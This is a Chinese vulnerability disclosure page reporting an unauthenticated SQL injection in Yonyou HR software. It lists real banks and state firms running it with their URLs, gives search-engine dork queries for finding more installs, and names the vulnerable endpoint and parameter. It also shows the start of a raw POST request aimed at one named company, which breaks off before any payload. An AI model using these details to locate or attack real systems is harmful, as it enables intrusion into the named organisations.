用友人力资源管理软件SQL注入漏洞(无需登录,影响所有版本)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: ### 详细说明: 用友软件: [<img src="https://images.seebug.org/upload/201408/0714585248f3d3584928a6f7d00d809e2010f057.jpg" alt="WE0X)RCOLSD`F`MS(XFSKO5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/0714585248f3d3584928a6f7d00d809e2010f057.jpg) 涉及客户非常多。都是大型国企、银行、能源、金融重要单位。 举例如下: 大连银行 http://zpyc.bankofdl.com 顺德农商行 http://career.sdebank.com 中国海洋石油总公司 http://zhaopin.cnooc.com.cn 北京市建筑设计研究院 www.biad.com.cn:88/ 民生银行 http://ehr.creditcard.cmbc.com.cn 中国中铁 http://61.232.6.108/ ....等等单位 直接谷歌搜 inurl:hrss/login.jsp inurl:hrss/rm inurl:hrss/index.html 。。。 由于某一参数rdp xml 注入。。。 ``` POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1 Content-Length: 564 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://zhaopin.cnooc.com.cn:80/ Cookie: JSESSIONID=EC2B32915FC45B239F95F8D334CB81D6.server; JSESSIONID=8D59F955762550CE8ACB019EEDD59700.server Host: zhaopin.cnooc.com.cn Connection: Keep-alive Accept-Encoding:...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息